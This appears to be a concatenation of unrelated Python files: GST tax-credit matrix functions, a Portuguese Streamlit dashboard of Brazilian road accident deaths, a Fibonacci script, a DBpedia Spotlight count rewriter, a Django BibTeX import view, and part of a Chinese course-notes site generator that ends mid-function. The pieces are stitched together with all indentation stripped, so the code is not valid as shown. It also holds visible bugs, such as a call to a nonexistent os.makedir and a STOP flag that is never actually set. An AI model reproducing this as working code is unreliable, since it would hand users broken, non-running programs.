# Function to compute the ratio of ITC disallowed
def calc_itc_disallowed_ratio(supply_mat, exempt_vec):
exempt_supply_mat = supply_mat * exempt_vec
exempt_supply_ind_vec = calc_sum_by_industry(exempt_supply_mat)
supply_ind_vec = calc_sum_by_industry(supply_mat)
itc_disallowed_ratio = np.divide(exempt_supply_ind_vec, supply_ind_vec,
out=np.zeros_like(exempt_supply_ind_vec), where=supply_ind_vec!=0)
return (itc_disallowed_ratio, exempt_supply_mat)
# Function to compute the ITC disallowed
def calc_itc_disallowed(input_tax_credit_vec, itc_disallowed_ratio):
itc_disallowed_vec = input_tax_credit_vec * itc_disallowed_ratio
return itc_disallowed_vec
def calc_input_tax_credit(use_mat, rate_vec):
input_tax_credit_mat = use_mat * rate_vec
return input_tax_credit_mat
# Function to get the industry wise total of a variable (i.e supply, use, tax etc)
def calc_sum_by_industry(input_mat):
output_vec = input_mat.sum(axis=0)
output_vec = output_vec.reshape(1, output_vec.shape[0])
return output_vec
# Function to get the commodity wise total of a variable (i.e supply, use, tax etc)
def calc_sum_by_commodity(input_mat):
output_vec = input_mat.sum(axis=1)
output_vec = output_vec.reshape(output_vec.shape[0], 1)
return output_vec
# Function to calculate the ratio for allocating imports/exports/taxes/subsidies of a product to each industry
def calc_allocation_ratio(input_mat):
sum_by_prod_vec = input_mat.sum(axis=1)
sum_by_prod_vec = sum_by_prod_vec.reshape(sum_by_prod_vec.shape[0],1)
# dividing use_mat by iiuse_vec while avoiding zero by zero
output_mat = np.divide(input_mat, sum_by_prod_vec,
out=np.zeros_like(input_mat), where=sum_by_prod_vec!=0)
return output_mat
# Function to calculate the ratio for allocating values of a product to each industry based on adjusted use matrix
def calc_allocation_by_use(use_mat, fin_cons_hh_vec ,fin_cons_gov_vec , gfcf_vec, vlbl_vec, cis_vec):
use_comm_vec = calc_sum_by_commodity(use_mat)
dom_use_vec = use_comm_vec + fin_cons_hh_vec + fin_cons_gov_vec + gfcf_vec + vlbl_vec + cis_vec
use_vec_ratio = use_comm_vec / dom_use_vec
fin_cons_hh_vec_ratio = fin_cons_hh_vec/ dom_use_vec
fin_cons_gov_vec_ratio = fin_cons_gov_vec/ dom_use_vec
gfcf_vec_ratio = gfcf_vec/ dom_use_vec
vlbl_vec_ratio = vlbl_vec/dom_use_vec
cis_vec_ratio = cis_vec/dom_use_vec
return (use_vec_ratio, fin_cons_hh_vec_ratio, fin_cons_gov_vec_ratio, gfcf_vec_ratio, vlbl_vec_ratio,
cis_vec_ratio)
# Function to allocate imports/exports/taxes/subsidies of a product to each industry proportionately
def calc_allocation_to_industry(allocation_mat, input_vec):
output_mat = allocation_mat * input_vec
return output_mat
# Function to calculate GST on imports
def calc_GST_on_imports(use_mat, import_vec, rate_vec):
allocation_ratio_by_use_mat = calc_allocation_ratio(use_mat)
import_mat = calc_allocation_to_industry(allocation_ratio_by_use_mat, import_vec)
GST_on_imports_mat = import_mat * rate_vec
GST_on_imports_ind_vec = calc_sum_by_industry(GST_on_imports_mat)
tot_GST_on_imports = GST_on_imports_ind_vec.sum()
return (GST_on_imports_ind_vec, tot_GST_on_imports)
# Function to export a vector by industry to a csv file
def make_ind_vec_df(input_vec, industry_header, output):
input_vec = input_vec.reshape(input_vec.shape[1], 1)
ind_df = pd.DataFrame(data=input_vec, index=industry_header, columns=np.array([output]))
ind_df = ind_df.reset_index()
ind_df = ind_df.rename(columns={'index':'industry_id'})
file_name = "Output_csv\\" + output + ".csv"
ind_df.to_csv(file_name)
return ind_df
# Function to export a vector by product to a csv file
def make_comm_vec_df(input_vec, df_product, output):
input_vec = input_vec.reshape(input_vec.shape[0], 1)
ind_df = pd.DataFrame(data=input_vec, index=df_product['srl_no'], columns=np.array([output]))
ind_df = ind_df.reset_index()
ind_df = ind_df.rename(columns={'index':'srl_no'})
ind_df = pd.merge(df_product, ind_df,
how="inner", on="srl_no")
file_name = "Output_csv\\" + output + ".csv"
ind_df.to_csv(file_name, index=False)
return ind_df
# Function to export a matrix to a csv file by converting it into vector by industry
def make_mat_ind_df(input_mat, industry_header, output):
input_vec = calc_sum_by_industry(input_mat)
make_ind_vec_df(input_vec, industry_header, output)
# Function to export a matrix to a csv file by converting it into vector by industry
def make_mat_df(input_mat, df_product, industry_header, output):
#input_mat = input_vec.reshape(input_vec.shape[0], 1)
ind_df = pd.DataFrame(data=input_mat, index=df_product['srl_no'], columns=np.array(industry_header))
ind_df = ind_df.reset_index()
#ind_df = ind_df.rename(columns={'index':'srl_no'})
ind_df = pd.merge(df_product, ind_df,
how="inner", on="srl_no")
file_name = "Output_csv\\" + output + ".csv"
ind_df.to_csv(file_name, index=False)
return ind_df
# Function to extract the relevant tax data (tax payable, ITC and cash) from GSTR1 & GSTR3
def hsn_tax_data(filename, sheet_name_cash_ratio, sheet_name_gstr1, gst_collection_full_year_dom):
# we have data by HSCode of a sample on the output tax and net gst paid (after inout tax credit)
# we use this data to calculate the ratio of net tax paid to output tax
# we shall use this data to apply to data from
# form gst1 which has only output tax data
# calculating the net tax paid ratios
tax_cash_df = pd.read_excel(filename, sheet_name_cash_ratio, index_col=False)
tax_cash_df.fillna(0, inplace=True)
tax_cash_df['cash_tax_payable_ratio'] = tax_cash_df['tax_cash']/tax_cash_df['tax_payable']
tax_cash_df['HSN2'] = np.where(tax_cash_df['HSN2']>9, tax_cash_df['HSN2'].astype(str),
('0'+ tax_cash_df['HSN2'].astype(str)))
# extracting the data from gstr1
df_gstr1 = pd.read_excel(filename, sheet_name_gstr1, index_col=False)
df_gstr1.fillna(0, inplace=True)
df_gstr1['HSN2'] = np.where(df_gstr1['HSN2']>9, df_gstr1['HSN2'].astype(str),
('0'+ df_gstr1['HSN2'].astype(str)))
# Data is for 8 months now grossedup to one year
df_gstr1['gstr1_tax_payable'] = df_gstr1['gstr1_tax_payable'] * (12/8)
tax_cash_df = pd.merge(tax_cash_df, df_gstr1,
how="inner", on="HSN2")
# applying the ratios calculated above to calculate the net tax paid
# from the putput tax given in gstr1
tax_cash_df['tax_cash'] = (tax_cash_df['cash_tax_payable_ratio'] *
tax_cash_df['gstr1_tax_payable'])
tax_collection_gstr1 = tax_cash_df['tax_cash'].sum()
# GSTR1 does not explain all the tax so blow up
blow_up_factor = (gst_collection_full_year_dom/tax_collection_gstr1)
tax_cash_df['tax_payable_bu'] = df_gstr1['gstr1_tax_payable']*blow_up_factor
tax_cash_df['tax_cash_bu'] = tax_cash_df['tax_cash']*blow_up_factor
tax_cash_df['tax_itc_bu'] = (tax_cash_df['tax_payable_bu'] -
tax_cash_df['tax_cash_bu'])
#tax_cash_dom_less_trade = tax_cash_df['tax_cash_bu'].sum()
# the dataframe tax_cash explains the complete tax collected
# and breaks it down by HS Code
return tax_cash_df
# Function to get the unique combination for SUT srl_no and HSN-2 digit code
def hsn_sut_conc(filename, concordance_sheet):
concordance_df = pd.read_excel(filename, concordance_sheet, index_col=False)
hsn_df = concordance_df.sort_values(['HSN2', 'srl_no'])
hsn_df['HSN2'] = np.where(hsn_df['HSN2']>9, hsn_df['HSN2'].astype(str),
('0'+ hsn_df['HSN2'].astype(str)))
hsn_df['key'] = hsn_df['srl_no'].astype(str) + '_' + hsn_df['HSN2']
hsn_df = hsn_df.drop_duplicates(subset='key', keep='first')
hsn_df = hsn_df.reset_index()
hsn_df = hsn_df.drop(['index', 'key', 'HSN', 'product_id'], axis=1)
hsn_df['srl_no'] = hsn_df['srl_no'].astype(str)
return hsn_df
def concord_comm_vec(hsn_df_copy, alloc_mat, alloc_var):
# concording the srl_no data and allocating to industry
# allocation is based on the distribution by srl_no
# as per alloc_mat - Supply or Use
# we first create a dataframe with the totals of supply by commodity
# i.e. by Srl_no
alloc_comm_vec = calc_sum_by_commodity(alloc_mat)
alloc_comm_vec_df = pd.DataFrame(data=alloc_comm_vec, columns=np.array([alloc_var]))
alloc_comm_vec_df = alloc_comm_vec_df.reset_index()
alloc_comm_vec_df = alloc_comm_vec_df.rename(columns={'index':'srl_no'})
alloc_comm_vec_df['srl_no'] = alloc_comm_vec_df['srl_no'] + 1
alloc_comm_vec_df['srl_no'] = alloc_comm_vec_df['srl_no'].astype(str)
# we then merge this onto the the srl_no HSN concordance file
# to allocate a HSN for each serial number
hsn_df_copy = pd.merge(hsn_df_copy, alloc_comm_vec_df,
how="outer", on="srl_no")
# we then group the alloc_var eg. output by HSN
alloc_hsn2 = hsn_df_copy.groupby('HSN2')[alloc_var].sum()
alloc_hsn2 = alloc_hsn2.values
alloc_hsn2_df = pd.DataFrame(data=alloc_hsn2, columns=np.array([alloc_var+'_hsn2']))
alloc_hsn2_df = alloc_hsn2_df.reset_index()
alloc_hsn2_df = alloc_hsn2_df.rename(columns={'index':'HSN2'})
alloc_hsn2_df['HSN2'] = np.where(alloc_hsn2_df['HSN2']>9, alloc_hsn2_df['HSN2'].astype(str),
('0'+ alloc_hsn2_df['HSN2'].astype(str)))
# we merge the alloc_var eg. output by HSN back to the srl_no HSN
# concordance we now have the HSN wise total of alloc_var eg. output
# mapped to every srl_no
hsn_df_copy = pd.merge(hsn_df_copy, alloc_hsn2_df,
how="outer", on="HSN2")
hsn_df_copy = hsn_df_copy.dropna()
# we calculate the weight of each output (alloc_var) by commodity for
# srl_no over the output per commodity by HSN
# This gives what proportion of HSN output (alloc_var) is one particular
# srl_no
hsn_df_copy['srl_HSN_wt'] = hsn_df_copy[alloc_var]/hsn_df_copy[alloc_var+'_hsn2']
hsn_df_copy = hsn_df_copy.sort_values('HSN2')
# we then use these weights to allocate the parameter we are trying to
# apportion by srl_no
if alloc_var=='output tax':
hsn_df_copy['alloc_var_srl_no'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_payable_bu']
else:
if alloc_var=='itc':
hsn_df_copy['alloc_var_srl_no'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_itc_bu']
else:
if alloc_var=='tax':
hsn_df_copy['alloc_var_srl_no'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_cash_bu']
else:
if alloc_var=='etr':
hsn_df_copy['alloc_var_srl_no1'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_payable']
hsn_df_copy['alloc_var_srl_no2'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['taxable_value']
hsn_df_copy['srl_no'] = hsn_df_copy['srl_no'].astype(int)
hsn_df_copy = hsn_df_copy.sort_values('srl_no')
# grouping by serial number as multiple entries are there
if alloc_var=='etr':
srl_no_alloc_var1 = hsn_df_copy.groupby('srl_no')['alloc_var_srl_no1'].sum()
srl_no_alloc_var2 = hsn_df_copy.groupby('srl_no')['alloc_var_srl_no2'].sum()
srl_no_alloc_var = np.where(srl_no_alloc_var2==0, 0, srl_no_alloc_var1/srl_no_alloc_var2)
srl_no_alloc_var_vec = srl_no_alloc_var.reshape(srl_no_alloc_var.shape[0], 1)
else:
srl_no_alloc_var = hsn_df_copy.groupby('srl_no')['alloc_var_srl_no'].sum()
# hsn_df[['srl_no', 'HSN2', 'tax_cash_bu', 'srl_HSN_wt', 'tax_cash_bu_srl_no']]
srl_no_alloc_var_df = srl_no_alloc_var.reset_index()
srl_no_alloc_var_df['srl_no'] = srl_no_alloc_var_df['srl_no'].astype(int)
srl_no_alloc_var_df = srl_no_alloc_var_df.sort_values('srl_no')
# srl_no_alloc_var_df.to_csv('srl_no_tax_cash.csv')
srl_no_alloc_var_vec = srl_no_alloc_var_df['alloc_var_srl_no'].values
srl_no_alloc_var_vec = srl_no_alloc_var_vec.reshape(srl_no_alloc_var_vec.shape[0], 1)
return srl_no_alloc_var_vec
def concord_ind_vec(srl_no_alloc_var_vec, allocation_ratio):
alloc_var_mat = calc_allocation_to_industry(allocation_ratio, srl_no_alloc_var_vec)
# np.savetxt("Output_csv\\alloc_sec.csv", alloc_var_mat , delimiter=",")
alloc_var_ind_vec = calc_sum_by_industry(alloc_var_mat)
return alloc_var_ind_vec
|
import streamlit as st
import pandas as pd
import numpy as np
import altair as alt
import os, urllib
from sklearn.linear_model import LinearRegression
from sklearn.datasets import make_regression
import matplotlib.pyplot as plt
from data_cleaner import data_cleaner_funtion
from regression import regression_function
from bokeh.plotting import figure
def main():
st.sidebar.title("Selecione a página")
app_mode = st.sidebar.selectbox("",
["Exploração de dados", "Modelagem"])
if app_mode == "Exploração de dados":
explorantion_page()
elif app_mode == "Modelagem":
modelagem_page()
@st.cache(show_spinner=False)
def load_data():
with st.spinner("Carregando dataset"):
# mensagem aqui para mostrar que os dados estão sendo carregados era bom...
url = 'https://bitbucket.org/SamuelHericlesBit/datasets/raw/f54dca5ffc162c58d66ff75c2df601e4f31c061c/acidentes2019_todas_causas_tipos.csv'
df = pd.read_csv(url, sep = ';', encoding = 'latin-1')
return data_cleaner_funtion(df)
df = load_data()
def freq_without_percent(x: pd.Series):
contagem = x.value_counts()
# percentual = round((x.value_counts() / x.shape[0]) * 100, 3)
res = pd.DataFrame({'Qtd.': contagem})
return res
def freq(x: pd.Series, plot=False):
contagem = x.value_counts()
percentual = round((x.value_counts() / x.shape[0]) * 100, 3)
res = pd.DataFrame({'Qtd.': contagem, 'Percentual': percentual})
if plot:
plt.show()
return res.sort_values('Percentual',ascending=False)
# Exploracao
def explorantion_page():
st.markdown('## Exploração dos dados')
st.markdown("### Ranking de mortos por município")
table_temp = df.groupby("municipio")["mortos"].sum().sort_values(ascending=False).head(10)
st.dataframe(table_temp)
st.markdown("### Ranking de mortos por rodovia")
table_temp = df.groupby("br")["mortos"].sum().sort_values(ascending=False).head(10)
st.dataframe(table_temp)
# grafico
# st.markdown("### Gráfico da quantidade de mortes por ocorrência no período de 04/2019 à 06/2019")
# df_prov = df.loc[df['data_inversa'] >= '2019-04']
# df_prov = df_prov.loc[df_prov['data_inversa'] <= '2019-06']
# st.line_chart(df_prov)
st.markdown("### Quantidade de mortes em ocorrências por estado")
df_prov = df.groupby("uf")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de tipos de acidentes por mortos")
df_prov = df.groupby("tipo_acidente")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de tipos de acidentes por traçado da via")
df_prov = df.loc[df['tipo_acidente'] == 'Colisão frontal']
df_prov = df_prov.groupby("tracado_via")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de causas de acidente por mortos no total")
df_prov = df.groupby("causa_acidente")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de dias da semana por mortos no total")
df_prov = df.groupby("dia_semana")["mortos"].sum().sort_values(ascending=False)
st.bar_chart(df_prov)
st.markdown("### Quantidade de mortes por condição metereológica")
df_prov = df.groupby("condicao_metereologica")["mortos"].sum().sort_values(ascending=False)
st.bar_chart(df_prov)
st.markdown("### Quantidade de mortes pela fase do dia")
df_prov = df.groupby("fase_dia")["mortos"].sum().sort_values(ascending=False)
st.bar_chart(df_prov)
# copy df
df_copy = df
st.markdown("### Quantidade de mortes em relação a idade dos envolvidos")
df_remove = df_copy.loc[(df['idade'] == 0)]
df_novo = df_copy.drop(df_remove.index)
df_prov = df_novo
df_prov = df_prov.groupby("idade")["mortos"].sum().sort_values(ascending=False).head(25)
st.bar_chart(df_prov)
st.markdown("### Quantidade de ocorrências por fase do dia")
df_prov = freq_without_percent(df.fase_dia.sort_values(ascending=False))
st.bar_chart(df_prov)
# Ranking
st.markdown("## Ranking's")
st.markdown("### Ranking do percentual de ocorrências por estado")
st.write(freq(df.uf, plot=True).head(10))
st.markdown("### Ranking do percentual de ocorrências por condição metereologica")
st.write(freq(df.condicao_metereologica, plot=True).head(10))
st.markdown("### Ranking do percentual de causa de acidentes")
st.write(freq(df.causa_acidente, plot=True).head(10))
st.markdown("### Ranking do percentual de tipo de acidente")
st.write(freq(df.tipo_acidente, plot=True).head(10))
st.markdown("### Ranking de ocorrência por tipo de via")
st.write(freq(df.tipo_pista, plot=True))
st.markdown("### Ranking de ocorrência por tipo de traçado da via")
st.write(freq(df.tracado_via, plot=True))
# Modelagem
inputs = []
def modelagem_page():
st.markdown('# Modelagem dos dados')
br = st.sidebar.selectbox('Escolha uma BR', df['br'].unique())
idade = st.sidebar.slider('Escolha a idade do condutor', 18, 100)
fase_dia = st.sidebar.selectbox('Escolha uma fase do dia', df['fase_dia'].unique())
fase_dia = list(df['fase_dia'].unique()).index(fase_dia) + 1
estado = st.sidebar.selectbox('Escolha um estado', df['uf'].unique())
municipio = st.sidebar.selectbox('Escolha um municipio', df.query('uf == "%s"' % estado)['municipio'].unique())
municipio = list(df.query('uf == "%s"' % estado)['municipio'].unique()).index(municipio) + 1
cond_meteorologica = st.sidebar.selectbox('Escolha uma condição meteorológica', df['condicao_metereologica'].unique())
cond_meteorologica = list(df['condicao_metereologica'].unique()).index(cond_meteorologica) + 1
dia_semana = st.sidebar.selectbox('Escolha um dia da semana', df['dia_semana'].unique())
dia_semana = list(df['dia_semana'].unique()).index(dia_semana) + 1
inputs = [br, idade, fase_dia, cond_meteorologica, municipio, dia_semana]
st.markdown('### Categorias de periculosidade da predição')
st.markdown("``Perigo muito elevado!``")
st.markdown("``Perigo acima da média``")
st.markdown("``Perigo baixo``")
st.markdown("``Perigo abaixo da média``")
st.markdown("``Perigo médio``")
st.write('Array de inputs')
st.write(inputs)
if st.sidebar.button('Predict!'):
with st.spinner('Carregando predição'):
result = regression_function(df, inputs)
st.markdown('### Predição da via:')
st.write(result)
if __name__ == "__main__":
main()
|
# -*- coding:utf-8 -*-
'''
Created on 2016��4��1��
@author: huke
'''
def fib(max):
n,a,b = 0 ,0 ,1
while n < max:
print(b)
a , b = b , a+b
n += 1
return "done"
if __name__ == '__main__':
fib(8)
|
l = input().split(' ')
s, a, n, c = 0, 0, 0, 0
while a == 0 or n == 0:
if int(l[c]) > 0:
if a == 0:
a = int(l[c])
elif n == 0:
n = int(l[c])
c += 1
for c in range(0, n):
s += a + c
print(s)
|
# -*- coding: utf-8 -*-
"""
Build a modified DBpedia Spotlight model by manipulating the raw data.
"""
import os, json, urllib2, sys, re
import unicodecsv as csv
from collections import defaultdict
from vocabulary import get_target_db
csv.field_size_limit(sys.maxint)
target_db = get_target_db()
def uri_to_id(uri, split_str="resource/"):
"""Split and unquote a URI to obtain a unicode ID.
"""
id_part = uri.split(split_str)[-1]
if id_part.startswith('/'):
id_part = id_part[1:]
return urllib2.unquote(id_part.encode('utf-8')).decode('utf-8')
def rewrite_tsv(file_path, rewrite_row, count_deltas=None):
"""Loop through the file at file_path and call
rewrite_row for each row. Modified rows are written
to a new output file.
"""
path, fname = os.path.split(file_path)
dirpath, dirname = os.path.split(path)
out_dirpath = os.path.join(dirpath, dirname+"_modified")
if not os.path.exists(out_dirpath):
os.makedir(out_dirpath)
with open(file_path, 'rb') as in_f:
tsvr = csv.reader(
in_f, delimiter='\t', encoding='utf-8', quotechar="|",
quoting=csv.QUOTE_NONE, lineterminator='\n'
)
with open(os.path.join(out_dirpath, fname), 'wb') as out_f:
tsvw = csv.writer(
out_f, delimiter='\t', encoding='utf-8', quotechar="|",
quoting=csv.QUOTE_NONE, lineterminator='\n', escapechar=None
)
for i, row in enumerate(tsvr):
mod_rows = rewrite_row(row, count_deltas)
for row in mod_rows:
try:
tsvw.writerow(row)
except csv.Error:
clean = clean_row(row)
tsvw.writerow(clean)
if i % 10000 == 0:
print "Processed %i0K rows from %s" % (i/10000, file_path)
return count_deltas, out_dirpath
def clean_row(row):
clean = []
print "clean_row(%s)" % repr(row)
for col in row:
if isinstance(col, basestring):
clean.append(re.sub(r'\W+', '', col.split('\t')[0]))
else:
clean.append(col)
return clean
# UriCounts, TokenCounts
# TODO: deal with redirects & disambiguation pages
## if unicode_id not in target_db: del row
def uri_counts(file_path):
def dbp_filter(row, _):
if uri_to_id(row[0]) in target_db:
return [row]
else:
return []
rewrite_tsv(file_path, dbp_filter)
def token_counts(file_path):
def wiki_filter(row, _):
if uri_to_id(row[0], split_str='wiki/') in target_db:
return [row]
else:
return []
rewrite_tsv(file_path, wiki_filter)
# PairCounts
"""Pseudocode
for row in tsvreader:
if unicode_id not in target_db:
count_deltas[surface_form] -= count
del row
elif not surface_form.islower():
count_deltas[surface_form.lower()] += count
duplicate row with surface_form.lower()
json.dump(count_deltas, f)
"""
def pair_counts(file_path):
def lowercase_duplicate(row, count_deltas):
if uri_to_id(row[1]) in target_db and len(row[0]) < 70:
if not row[0].islower():
count_deltas[row[0].lower()] += int(row[2])
add_row = [row[0].lower(), row[1], row[2]]
return [row, add_row]
else:
return [row]
else:
count_deltas[row[0]] -= int(row[2])
return []
deltas_dict = defaultdict(int)
count_deltas, base_path = rewrite_tsv(
file_path, lowercase_duplicate, deltas_dict
)
cd_path = os.path.join(base_path, "count_deltas.json")
with open(cd_path, 'wb') as jfile:
json.dump(count_deltas, jfile)
return count_deltas
# SFandTotalCounts
"""Pseudocode
for row in tsvreader:
this_change = count_deltas.pop(surface_form, 0)
if this_change:
if count < 0:
count = this_change
else:
count += this_change
if count <= 0:
count = -1
for sf, dc in count_deltas.iteritems():
append row [sf, dc, -1]
"""
def sf_and_total_counts(file_path, count_deltas, add_lowercase=True):
def update_counts(row, count_deltas):
this_change = count_deltas.pop(row[0], 0)
if this_change:
sf_count, total_count = int(row[1]), int(row[2] or -1)
if sf_count < 0:
sf_count = this_change
else:
sf_count += this_change
if sf_count <= 0:
sf_count = -1
if total_count != -1 and total_count < sf_count:
total_count = sf_count
if max(sf_count, total_count) > 0:
return [[row[0], sf_count, total_count]]
else:
return []
else:
return [row]
_, base_path = rewrite_tsv(file_path, update_counts, count_deltas)
if add_lowercase:
# Add rows for lowercase duplicates
_, fname = os.path.split(file_path)
with open(os.path.join(base_path, fname), 'a') as out_f:
tsvw = csv.writer(
out_f, delimiter='\t', encoding='utf-8', quoting=csv.QUOTE_NONE,
lineterminator='\n', escapechar=None, quotechar="|"
)
print "Adding {0} lowercase duplicates".format(len(count_deltas))
for sf, dc in count_deltas.iteritems():
if dc > 0:
tsvw.writerow(clean_row([sf, dc, -1]))
# Rewrite all raw data files
def rewrite_all(base_path):
uri_counts(os.path.join(base_path, "uriCounts"))
token_counts(os.path.join(base_path, "tokenCounts"))
count_deltas = pair_counts(os.path.join(base_path, "pairCounts"))
sf_and_total_counts(
os.path.join(base_path, "sfAndTotalCounts"), count_deltas, add_lowercase=False
)
return count_deltas
|
__license__ = 'MIT License <http://www.opensource.org/licenses/mit-license.php>'
__author__ = 'Lucas Theis <lucas@theis.io>'
__docformat__ = 'epytext'
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib import messages
from django.http import HttpResponseRedirect
from publications.bibtex import import_bibtex_data, parse
from publications.models import Publication, Type
def import_bibtex(request):
if request.method == 'POST':
if not request.POST['bibliography']:
errors = {'bibliography' : 'This field is required.'}
else:
# try to parse BibTex
bib = parse(request.POST['bibliography'])
response = import_bibtex_data(bib)
errors = response['errors']
if errors:
# some error occurred
return render_to_response(
'admin/publications/import_bibtex.html', {
'errors': errors,
'title': 'Import BibTex',
'types': Type.objects.all(),
'request': request},
RequestContext(request))
else:
# show message
messages.info(request, response['msg'])
# redirect to publication listing
return HttpResponseRedirect('../')
else:
return render_to_response(
'admin/publications/import_bibtex.html', {
'title': 'Import BibTex',
'types': Type.objects.all(),
'request': request},
RequestContext(request))
import_bibtex = staff_member_required(import_bibtex)
|
#/usr/bin/env python3
# -*- encoding: utf8 -*-
server_version = "0.2.3"
server_log = """
0.0.3 2018-06-11 使用model提供的类方法而不是对象属性重构了项目,使用API解耦合。
添加了Pickle存储对象,方便进行调试。
对于从源HTML中获取Chapter的信息,提供了一个类方法,现在只需要一句话就可以完全自动构建Course对象,
其中自动化Course的信息、包含章节的信息以及每个章节相关笔记的信息。
0.0.4 2018-06-11 完善related_notes笔记接口,提供三种标准(问题、名言、博客类型),整个程序大体完成。
0.1.0 Alpha 上线测试
0.1.1 2018年6月18日 添加了 ‘explain’ 类型的笔记。给每个笔记添加了链接。解决了目录显示顺序随机的问题。
0.2.0 2018年7月14日 修正了一些错误,优化了转换ipynb文件的逻辑,提高了健壮性,现在复制文件会根据时间来计算,避免了全局复制,减小更新负担。
转化文件按照文件夹顺序,加快了程序运行。降低了配置文件复杂程度,现在不需要声明允许的文件夹信息。
0.2.2 2018年7月14日 服务器上线,修正了一些日志的逻辑问题,添加了注释,不再保存数据到last_data中。
0.2.3 2018年7月15日 修复convert模块中一个导致日期判断出错的bug。
"""
from muninn_config import *
import random,os,re,pickle
from model import *
import convert,traceback
STOP = False
def constructWorld(courses,head=None,notes=None):
"""构建OO对象,仅初始化课程及其包含的章节,不包括章节具体标题、描述和相关笔记。"""
clist = []
#head包含了章节顺序信息,其也是courses字典的key值
#从config.py中配置Course信息,包括Course信息,其包含的Chapter信息(构建Chapter对象)
# 以及对应地址包含的Chapter标题、描述和相关Note对象信息
try:
for key in head:
c = Course().set_config(courses[key])
clist.append(c)
except:
print("\n"+"X"*20,"\n课程添加出错,可能是索引不正确..\n","X"*20+"\n")
print(traceback.format_exc())
try:
convert.transData(clist,from_source=JUPYTER_NOTEBOOK_ROOT_FOLDER,
to_source=HTML_DST_FOLDER+SEP)
needfiles = convert.findIpynb(clist,from_source=JUPYTER_NOTEBOOK_ROOT_FOLDER,
to_source=HTML_DST_FOLDER+SEP)
if len(needfiles) == 0:
STOP = True
return []
convert.convertNotes(clist,"source",needfiles=needfiles)
except:
print("\n"+"X"*20,"在转换文件时出错","X"*20+"\n")
print(traceback.format_exc())
try:
for course in clist:
course.set_chapter(chapter_address="source",get_header=True,get_description=True,get_notes=True,reload_info=True)
except:
print("\n"+"X"*20,"在写入章节信息时出错","X"*20+"\n")
print(traceback.format_exc())
return clist
def main(update_data=False,file_path=""):
#首先调用构建OO对象的函数,构建课程集
print("="*20,"开始处理数据","="*20)
if update_data:
print("正在构建项目")
clist = constructWorld(COURSE_INFO,COURSE_HEAD)
#p = pickle.dump(clist,open(file_path,"wb"))
#print("项目构建完毕,并且存放在:%s"%file_path)
else:
print("从备份中读取项目")
clist = pickle.load(open(file_path,"rb"))
if STOP or len(clist) == 0:
print("没有更新内容,本次更新已跳过.")
return 0
#首先根据所有项目生成一个HTML页面的菜单,点击链接到下面创建的html文件中
menu_html = makeHead(clist)
# 对于index页面进行生成
index_html = make_Index(menu_html)
writeToFile(index=True,html=index_html)
# #接着根据每个页面的信息生成单独的页面,每个页面的命名根据课程名称进行命名
for c in clist:
overview = makeHTMLPage(c,menu_html)
print("\t生成HTML::课程总览",c)
writeToFile(c,overview)
for ch in c.chapters:
print("\t\t生成HTML::章节信息",ch)
ch_html = makeHTMLPage(c,menu_html,is_chapter=True,chapter_id=ch.id)
writeToFile(c,ch_html,suffix="_ch_%s.html"%ch.id)
print("\n"+"="*20,"FINISHED","="*20+"\n")
def makeHead(clist):
"""根据所有的课程信息返回一个HTML语言的导航条"""
out_html = ""
dropdown_html = ""
finished_2st = []
for c in clist:
if not c.have_father():
out_html += """ <li class="nav-item">
<a class="nav-link" href="%s">%s</a>
</li>
"""%("/"+c.get_uri(full_path=True,suffix="_overview.html"),c.get_name())
#print("here :",c.get_uri(full_path=True,suffix="_overview.html"))
else:
rand_a = random.randint(1000,9999)
sub_html = ""
for cs in clist:
if (cs.get_name(fname=True) in finished_2st) or (not cs.have_father()) or\
(cs.get_name(fname=True) != c.get_name(fname=True)):
continue
else:
if not cs.get_type():
_type = ""
else: _type = cs.get_type()
sub_html += """
<a class="dropdown-item" href="%s">%s <small>%s</small></a>
"""%("/"+cs.get_uri(full_path=True,suffix="_overview.html"),cs.get_name(),_type)
if not c.get_name(fname=True) in finished_2st:
dropdown_now_html = """
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" id="%s" data-toggle="dropdown">%s</a>
<div class="dropdown-menu" aria-labelledby="%s">%s</div>
</li>"""%(rand_a,c.get_name(fname=True),rand_a,sub_html)
out_html += dropdown_now_html
finished_2st.append(c.get_name(fname=True))
menu_html = """
<nav class="navbar navbar-expand navbar-dark bg-dark">
<a class="navbar-brand" href="/">MUNINN <small>by Corkine Ma</small></a>
<div class="navbar-collapse collapse justify-content-between">
<ul class="navbar-nav">
%s
</ul>
</div>
<div class="collapse navbar-collapse justify-content-end"></div>
</nav>
"""%out_html
return menu_html
def makeHTMLPage(course_info,menu_html,is_chapter=False,chapter_id="",chapter_address="source"):
"""对于课程总览,在此返回HTML页面。对于每个章节,也在此返回HTML页面。"""
c = course_info
chapter_html = ""
notes_html = ""
html_now = ""
intro_content = "尚未添加内容"
detail_map = {
"h1_title":"",
"h2_html":"",
}
chapter_update = "2018-01-01"
chapter_url = "#"
for ch in c.chapters:
#如果需要处理的是章节页面,找到当前章节并进行以下处理:
if is_chapter and ch.id == chapter_id:
#左侧上方标题
chapter_html += """<a href="%s" class="list-group-item list-group-item-action d-flex justify-content-between align-items-center active">
%s<span class="badge badge-primary badge-pill">%s</span></a>"""%(c.get_uri(is_chapter=True,chapter=ch.id),ch.name,ch.mark)
#左侧下方章节内容
current_h1 = ""
html_now = """ <ul class="list-group">
<li class="list-group-item list-group-item-light">章节目录</li>"""
if ch.get_header():
for head in ch.get_header():
if not current_h1: current_h1 = head
if head.startswith("<h1>") and current_h1 != head:
html_now += """</ul>
</li>"""
current_h1 = head
if head.startswith("<h1>"):
html_now += """
<li class="list-group-item">
%s
<ul class="list-group list-group-flush">"""%head.replace("<h1>","")
if head.startswith("<h2>"):
html_now += """<li class="list-group-item">%s</li>"""%head.replace("<h2>","")
html_now += """</ul></li>"""
#这里是寻找<intro>标签,然后返回右侧上方的章节总体概要信息。
intro_content = ch.get_description()
